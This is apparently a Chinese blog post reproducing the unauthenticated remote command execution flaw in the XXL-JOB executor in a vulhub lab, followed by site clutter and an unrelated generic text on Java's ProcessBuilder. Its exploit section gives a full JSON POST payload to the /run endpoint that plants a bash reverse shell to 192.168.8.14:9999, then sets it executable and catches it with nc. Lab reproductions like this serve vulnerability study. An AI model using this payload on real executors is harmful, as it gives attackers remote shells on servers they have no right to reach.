xxl-job远程命令执行漏洞复现

1、漏洞描述

XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可以通过RESTful API执行任意命令。

2、靶场搭建

靶场使用vulhub
进入vulhub/xxl-job/unacc目录下,执行docker-compose up -d
在这里插入图片描述
容器起来后,docker ps -a看一下
在这里插入图片描述
浏览器访问http://your-ip:9999
在这里插入图片描述
看到如上图,说明漏洞环境部署成功。

3、漏洞复现(反弹shell)

浏览器访问http://your-ip:9999/run,并通过bp抓包
在这里插入图片描述

修改请求方式为POST ,并写入exp,然后发送请求

exp:

{
  "jobId": 1,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "COVER_EARLY",
  "executorTimeout": 0,
  "logId": 1,
  "logDateTime": 1586629003729,
  "glueType": "GLUE_SHELL",
  "glueSource": "echo 'bash -i >& /dev/tcp/192.168.8.14/9999 0>&1' > /tmp/1.sh",
  "glueUpdatetime": 1586699003758,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}

在这里插入图片描述
将/tmp/1.sh赋予可执行权限
在这里插入图片描述
开启nc监听
在这里插入图片描述
执行命令:
在这里插入图片描述
查看nc监听,反弹成功
在这里插入图片描述

  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
xxl-job是一款轻量级的分布式任务调度框架,它支持多种任务类型,包括shell脚本、Java类、Python脚本等,并提供了完善的任务管理和调度能力。其中,命令执行xxl-job的一个常用功能,通过命令执行,用户可以在任务中直接执行系统命令,从而实现一些特殊的操作。 在xxl-job中,命令执行的使用非常简单,用户只需要在任务执行逻辑中调用ProcessBuilder.start()方法即可。该方法将会创建一个系统进程,并执行指定的命令。用户可以通过ProcessBuilder对象的方法设置命令的参数等信息,以满足不同的需求。例如,下面的代码演示了如何通过xxl-job执行一个Linux系统的命令: ``` ProcessBuilder pb = new ProcessBuilder("ls", "-l"); pb.directory(new File("/tmp")); Process p = pb.start(); ``` 在上述代码中,我们首先创建了一个ProcessBuilder对象,并设置了要执行命令及其参数。接着,通过ProcessBuilder.directory()方法指定了命令执行的工作目录,这里是“/tmp”。最后,调用ProcessBuilder.start()方法启动进程,并返回一个Process对象,可以通过该对象获取进程的输出等信息。 需要注意的是,由于xxl-job的任务执行是在子线程中进行的,因此需要确保命令执行的线程安全性。通常情况下,可以通过synchronized或者ReentrantLock等手段进行线程同步,以避免竞态条件等问题的发生。 除了ProcessBuilder外,xxl-job还提供了一些其他的命令执行方式,例如通过Runtime.exec()方法或者Process类的其他方法执行命令等。用户可以根据实际需要选择适合的方式,以实现所需的功能。 总之,xxl-job命令执行功能可以极大地扩展任务的灵活性和功能性,同时也需要注意线程安全等问题,以确保任务的稳定运行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值